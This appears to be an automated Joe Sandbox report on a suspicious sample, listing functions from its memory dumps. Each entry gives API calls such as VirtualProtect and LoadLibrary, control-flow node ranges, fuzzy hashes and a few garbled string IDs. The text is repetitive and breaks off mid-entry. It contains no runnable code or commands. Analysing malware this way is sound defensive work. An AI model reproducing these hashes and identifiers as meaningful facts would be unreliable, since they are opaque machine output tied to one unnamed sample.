                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 999 1531518-153151a 1000 1531731-15318b8 VirtualProtect 999->1000 1001 1531520-1531527 999->1001 1007 15318c1-15318e2 1000->1007 1008 15318ba-15318c0 1000->1008 1001->1000 1002 153152d-153153a 1001->1002 1002->1000 1008->1007
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 4ceab82db7297caeca28506c090b8d04990fdfb86ad44d9aa680c1068af0040c
                • Instruction ID: b3e4fd9a7165d4a733074679ee2490655faf4f262eb0330dd5fe2d602f5ad164
                • Opcode Fuzzy Hash: 4ceab82db7297caeca28506c090b8d04990fdfb86ad44d9aa680c1068af0040c
                • Instruction Fuzzy Hash: 45519D708443459FCB94CFA4D8C59DABBB9FF85334B18C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: ad35349c2bde686f81e48519483075ae139d1f8fa1710dbc6a5e60db1881ed54
                • Instruction ID: 2b0c5637117dd18ab573ce63593395dd7978ab4d4b932457758a30c246f724ac
                • Opcode Fuzzy Hash: ad35349c2bde686f81e48519483075ae139d1f8fa1710dbc6a5e60db1881ed54
                • Instruction Fuzzy Hash: F7518E708443459FCB94CF64D9C59DABBB9FB84334B48C06AEC445A206D33DA94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 976 1531454-1531456 977 1531731-15318b8 VirtualProtect 976->977 978 153145c-1531463 976->978 984 15318c1-15318e2 977->984 985 15318ba-15318c0 977->985 978->977 979 1531469-1531475 978->979 979->977 985->984
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 3ef3ad6e864e56ad363057221c9917c25694b98cceee2a12e27c860c88c0db07
                • Instruction ID: 361396d564889243b44076040580bb24c420199309894a572ff569487c8e73ca
                • Opcode Fuzzy Hash: 3ef3ad6e864e56ad363057221c9917c25694b98cceee2a12e27c860c88c0db07
                • Instruction Fuzzy Hash: A1518F708443459FCB54CFA4DDC59DABBB9FB85334B08C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 987 1531481-1531483 988 1531731-15318b8 VirtualProtect 987->988 989 1531489-1531490 987->989 996 15318c1-15318e2 988->996 997 15318ba-15318c0 988->997 989->988 992 1531496-15314a3 989->992 992->988 997->996
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 8318e8e3d116eda560de3bb67e6ab5ee78c1cdb6da06269ac591f6b7dbfba4d3
                • Instruction ID: 3bd2981589b57f473f1d943148f71698487e1b3346ac6d79a199a64933f65664
                • Opcode Fuzzy Hash: 8318e8e3d116eda560de3bb67e6ab5ee78c1cdb6da06269ac591f6b7dbfba4d3
                • Instruction Fuzzy Hash: 4C518C708443459FCB54CFA4D9C59EABBB9FB84334B08C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e32483cc80f073470350ad61b95fd9aa134c3799fddb612e1b3769c8426c8062
                • Instruction ID: e634c27f557f2a2235941013ce93e15fd767800c965e75f23d65245a5239093e
                • Opcode Fuzzy Hash: e32483cc80f073470350ad61b95fd9aa134c3799fddb612e1b3769c8426c8062
                • Instruction Fuzzy Hash: B0517D708443459FCB54CFA4D8C59DABBB9FB84334B18C06AEC449A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eb3b23753f03bae63bbd33d0798e9d6397cf0d99adef1d721890fc704553a543
                • Instruction ID: ed7ef171e94b033bf84460f6d2747170ad38db7f9b7168a3d798451a9eeaa431
                • Opcode Fuzzy Hash: eb3b23753f03bae63bbd33d0798e9d6397cf0d99adef1d721890fc704553a543
                • Instruction Fuzzy Hash: 34519FB08443459FCB54CF64DCC59EABBB9FB85334B08C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a95d172f625312cf83b80333ca5c8c83a8c7a4e5ec45674a30dd48d5c3c8b581
                • Instruction ID: ddcc436e99faad983aa886789d84804d6d3dc89e5be6d0d1c83c89d01df7102a
                • Opcode Fuzzy Hash: a95d172f625312cf83b80333ca5c8c83a8c7a4e5ec45674a30dd48d5c3c8b581
                • Instruction Fuzzy Hash: C1517C708443459FCB54CFA4DCC59EABBB9FB84334B18C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3eb9c8bf8481c5f8252ffaa52676bc30b3c09b65032177d6fb5d6cefd8bc3dcd
                • Instruction ID: 9e90724e95ff64d07afe334febfd8651c1bc99bf741d49d5b2bd673c02fab03b
                • Opcode Fuzzy Hash: 3eb9c8bf8481c5f8252ffaa52676bc30b3c09b65032177d6fb5d6cefd8bc3dcd
                • Instruction Fuzzy Hash: 06518C708443459FCB54CFA4D9C59EABBB9FF84334B08C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 674d37fcc747329749d7cf0e584f530763d5d90042c30a5359fdec326432324e
                • Instruction ID: a17928b713a4bc49f2faf4755177b152c2752c4b6d43c744fd73d6d667a8d32b
                • Opcode Fuzzy Hash: 674d37fcc747329749d7cf0e584f530763d5d90042c30a5359fdec326432324e
                • Instruction Fuzzy Hash: 68517E708443459FCB54CFA4D8C59DABBB9FF84334B58C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 71540a70d49944a23296c1714765db9bb9e7da402dd664564a412a679b6abdb9
                • Instruction ID: d8f3896124e5e09331afc5aa282d043735318f4e7a1bd852b736f5cfe13aa763
                • Opcode Fuzzy Hash: 71540a70d49944a23296c1714765db9bb9e7da402dd664564a412a679b6abdb9
                • Instruction Fuzzy Hash: 583132B5D00249CFDF14CFA8E8867EDBBB1BB08314F24852AE815AB380DB749485CF95
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: fa63c6167665694ea47f347e1004bd066f2e1131a60b8004bcdd6c21d034c100
                • Instruction ID: 859e7ca99a5806028f294eeca624a8e1cbf3ba1094162342759e181f75b2215a
                • Opcode Fuzzy Hash: fa63c6167665694ea47f347e1004bd066f2e1131a60b8004bcdd6c21d034c100
                • Instruction Fuzzy Hash: B03122B1D00249DFDF14CFA8E8867AEBBF1BB08314F24852AE815A7380DB749485CF95
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: 1699869f3aadeafb328b5054a9801a90fadb61a1ddc42f9101285b97063862b2
                • Instruction ID: 0d594fdc67dcda4fe10ba669638a4293f0509fc613230b5e2f55aba3857b5d4f
                • Opcode Fuzzy Hash: 1699869f3aadeafb328b5054a9801a90fadb61a1ddc42f9101285b97063862b2
                • Instruction Fuzzy Hash: BF21A4B4808251CFD725AFB4E8586EE3FB1FF89315F000866D046CB555D7345D05EB52
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0153962B
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: 39baf587630cc0c4ea790300c154decbe2c0243e6d856261a5b618b8f6a3a412
                • Instruction ID: c7a90cc299ca14d0daaff3cf874ed72b3af3d22bfc72a77da2981fa286b734a0
                • Opcode Fuzzy Hash: 39baf587630cc0c4ea790300c154decbe2c0243e6d856261a5b618b8f6a3a412
                • Instruction Fuzzy Hash: DA2187B1C013498FCB10CFA9D8446EEBBF4FB49324F10885AD819BB281D7346A05CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 401a842230c52aa7a77404807a4d61541bf7311990d7652232fe9241251596a6
                • Instruction ID: 7f1e2a76be2cbfcf74e9d170e44997d6f727e67cdf4a6b961db1933b399b6d7a
                • Opcode Fuzzy Hash: 401a842230c52aa7a77404807a4d61541bf7311990d7652232fe9241251596a6
                • Instruction Fuzzy Hash: 7921E8B5D006099FCB10CF9AD884BEEFBF4FB49324F148429E458A7240D3749545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0153962B
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: 60c67b8f69f5bfeb486af988f52a872bd6cfdbf007bac18fe699f264353c9cca
                • Instruction ID: 3c89dbf89e262d7993e681912af374f3bbeb681f278ef5ec17c77f47dcd5da9f
                • Opcode Fuzzy Hash: 60c67b8f69f5bfeb486af988f52a872bd6cfdbf007bac18fe699f264353c9cca
                • Instruction Fuzzy Hash: 582138B1C013098FCB10CFA9D4446EEBBF8BB48324F10851AD819B7340D7756A04CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 771afaf7abcc740a12b6269e6be0bd3427832587150c17a6fd49873751f9fb21
                • Instruction ID: b513d06b8dcf2625a09e0f670142b1414febcebee85e12353db5d848e13ff4da
                • Opcode Fuzzy Hash: 771afaf7abcc740a12b6269e6be0bd3427832587150c17a6fd49873751f9fb21
                • Instruction Fuzzy Hash: C921F4B29006099FCB10CFAAC484BDEFBF4BB48324F148429E558A7240D374A544CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: a82c2b825b0ada0455460b1144619223571f54fe34a04204bf48a6a98489f3b0
                • Instruction ID: ff029a20fb969fbffb8c3fb596144b4b4e079653b1ac82bb898e8523ad5cadca
                • Opcode Fuzzy Hash: a82c2b825b0ada0455460b1144619223571f54fe34a04204bf48a6a98489f3b0
                • Instruction Fuzzy Hash: DAF0ECB8908055DFEA286BF0E50D5BD3FB6BB8C30A7000454E5578B699CF302D54EB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: 84a295729075fea82e4a1beed3b411bad931ba2c11a4e0fe0bed8d605e1c0373
                • Instruction ID: 3d112d1469181bc3212a601f977563046ec407f90dfa8ba00cc0106a4bfbd6ed
                • Opcode Fuzzy Hash: 84a295729075fea82e4a1beed3b411bad931ba2c11a4e0fe0bed8d605e1c0373
                • Instruction Fuzzy Hash: A9F01DB8904015DBEB286BF0E40D5BD3FB6BB8C30A7000450E5178B699CF302D14FB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: 5b17b7c05b6675f8a0e2e51fdabc1994fc51f8958dcdac0be6fb0201a7c64055
                • Instruction ID: 6b8219ca7ca494d9f2bd0d4c1bbb3abed6f4400f6569acd264951c9d6497c621
                • Opcode Fuzzy Hash: 5b17b7c05b6675f8a0e2e51fdabc1994fc51f8958dcdac0be6fb0201a7c64055
                • Instruction Fuzzy Hash: 2BF05EB8A04011DBDB286BB0E40D1BD3FB6BB8C30AB000450E6178BA99CF302D04FB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: 2ada5d731a0ae71482c18ebb00a68fde4a732f565ec08041057bea637454327f
                • Instruction ID: e7093df73049e534e5faaaabcc2b7a2cb2086d3c979bc64e6592e447d8f0cc3b
                • Opcode Fuzzy Hash: 2ada5d731a0ae71482c18ebb00a68fde4a732f565ec08041057bea637454327f
                • Instruction Fuzzy Hash: 2EF01C78A04055DBEB286BB0E41D5BD7BB6BB8C30AB000454E6178BAD8CF712D44FB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: ceedf321b5a3f326ae211adff935835d0181dcbda68677fb78b8a614c9ce08a9
                • Instruction ID: 6f31720eb435019828235019b8a03c9452cca04b8bc65f1d9160c9adec8e4fd0
                • Opcode Fuzzy Hash: ceedf321b5a3f326ae211adff935835d0181dcbda68677fb78b8a614c9ce08a9
                • Instruction Fuzzy Hash: 25F03078A04054DBEB246BB0E40C5BD7BB6BB8C30AB000454E5178B7D8CF712D04FB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: 2180fc2ccfcc1ff6544e0ca658e1c9a80b7cb21459307ac275066f61f680fbca
                • Instruction ID: 74d58bc72bb25a22a18ec53114d544c503e8a6f2562f6b16735b2575fccd8259
                • Opcode Fuzzy Hash: 2180fc2ccfcc1ff6544e0ca658e1c9a80b7cb21459307ac275066f61f680fbca
                • Instruction Fuzzy Hash: A0E06D78A04054DBEB246BB0E40C1BD7BB6BB8C30EB000454E5278B798CF312D04AB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL ref: 01537468
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID:
                • API String ID: 6842923-0
                • Opcode ID: b758eaddcb8f4c333cb56a9801bbb202f93f73c3a96c95bba7cb85deaa991707
                • Instruction ID: 08e438a2691a93f91f8ea2fc0f530ddb827e5b6ad4a6eeb6fb67b77d44b5372b
                • Opcode Fuzzy Hash: b758eaddcb8f4c333cb56a9801bbb202f93f73c3a96c95bba7cb85deaa991707
                • Instruction Fuzzy Hash: DDE06578604050DBDA24ABA0E4081AE7BB6BB8C30EB000454E52A8B798CF312D08AB82
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433716307.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_143d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: caad7f2df4af5e53e18207399fe18a87e8a1e4241d214394e6f1893eaa4e8c10
                • Instruction ID: 462f990968f9bb501263d13d2a18346111a4d049c70faa40c1582d93cd313a65
                • Opcode Fuzzy Hash: caad7f2df4af5e53e18207399fe18a87e8a1e4241d214394e6f1893eaa4e8c10
                • Instruction Fuzzy Hash: 76210671904240EFDB05CF94D9C0BA7BB65FBD8324F64C57AE9050B256C336E456C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433716307.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_143d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 19a2b26a5fc75fd00bb5c30a10f2e3d3a398492b119a271fce9a3b70096868de
                • Instruction ID: 6588ce193332bf6d9ce7a6a1433563dc604413d0b0a7c8e9b231803a5bf33583
                • Opcode Fuzzy Hash: 19a2b26a5fc75fd00bb5c30a10f2e3d3a398492b119a271fce9a3b70096868de
                • Instruction Fuzzy Hash: EC21D671904240DFDB05DF94D9C0B67BFA5FBCC328F64896AE8050B296C336D95ACAA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433734021.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_144d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 05c1f90abf9059a02d71395c9d01663695a398dae4bda04b1fe87c1c3046c32a
                • Instruction ID: a83c3bdf6644a452057ceddefc33fffbe47a7282bf3be79a23e21f0f9d50fc9d
                • Opcode Fuzzy Hash: 05c1f90abf9059a02d71395c9d01663695a398dae4bda04b1fe87c1c3046c32a
                • Instruction Fuzzy Hash: E62126B1904244DFEB15DF94D8C0B2ABBA5FB88368F24C96BD8090B356C336D807C6A1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433734021.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_144d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 73c4208646dc123486581d250d0b20bafa5e2eaf3154ee5b0f3cd835c6fe6c85
                • Instruction ID: 2025e1a5dd9f456bdad5304e5521ee145e56af1d45a9f833c2518ca7508c7e5e
                • Opcode Fuzzy Hash: 73c4208646dc123486581d250d0b20bafa5e2eaf3154ee5b0f3cd835c6fe6c85
                • Instruction Fuzzy Hash: 95212C75A04200DFEB05CFA4D5C0B26BBA5FB44324F24C96ED8494B356C336D846CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433716307.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_143d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                • Instruction ID: 10f81e9af853ee2d9aa130373d6713e453382e7adcf1dfcf666533ebcd39376f
                • Opcode Fuzzy Hash: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                • Instruction Fuzzy Hash: 8311B176804280CFDB12CF54D5C4B16BFB1FB88324F2486AAD8050B767C336D55ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433716307.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_143d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                • Instruction ID: 84e9507292c07598aef5fca5d6976b5a61248e325aa05936798f0f8b39e59cd3
                • Opcode Fuzzy Hash: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                • Instruction Fuzzy Hash: 3511DF72804280DFCB12CF44D9C4B56BF71FB98324F24C2AAD8050B667C33AE45ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433734021.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_144d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: deee60406d66ec89b377f23f0127d2298a1e2cce8956a74edbc4243175f6b6bf
                • Instruction ID: 583053b38f926298018e3a184f7f386f0ca67c0167299b7fa6de9fb966576392
                • Opcode Fuzzy Hash: deee60406d66ec89b377f23f0127d2298a1e2cce8956a74edbc4243175f6b6bf
                • Instruction Fuzzy Hash: 14119075904280DFEB02CF54D5C4B16BFA1FB45324F24C6AAD8494B766C33AD84ACB51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433734021.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_144d000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff41948d97a7a60df7a99fae81293363046946de1c10f3e03ca3fc98680e80e5
                • Instruction ID: c653fa421f2f08ad273ca7626490abe982264f007cf3db2607db95efd5045538
                • Opcode Fuzzy Hash: ff41948d97a7a60df7a99fae81293363046946de1c10f3e03ca3fc98680e80e5
                • Instruction Fuzzy Hash: 9C119075904284CFEB12CF14D5C4B1AFBB1FB84224F24C6AAD8494B756C33AD44ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
                • API String ID: 0-3557550785
                • Opcode ID: 4d528c01250be55c51ffe3ae5e644a24879cf9530b87448e5909b57bbafe6311
                • Instruction ID: 39134747d4c662c19274e139af454231b4b718f3aa755849bbb8c849ea955b43
                • Opcode Fuzzy Hash: 4d528c01250be55c51ffe3ae5e644a24879cf9530b87448e5909b57bbafe6311
                • Instruction Fuzzy Hash: CE826974A04229CFDB64DF58E998B9DB7B6FB98700F2081D9D40AAB354DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
                • API String ID: 0-3557550785
                • Opcode ID: 4349be3961f5b5741fac267be40edea2ba0ca98bd33a23862e03b4b037e60f81
                • Instruction ID: 62e68a49e85f119b7b7cbdd88c36e4653e7a8fc95bae5f26c49b0ab7b0f18f30
                • Opcode Fuzzy Hash: 4349be3961f5b5741fac267be40edea2ba0ca98bd33a23862e03b4b037e60f81
                • Instruction Fuzzy Hash: 62826A74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D40AAB354DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
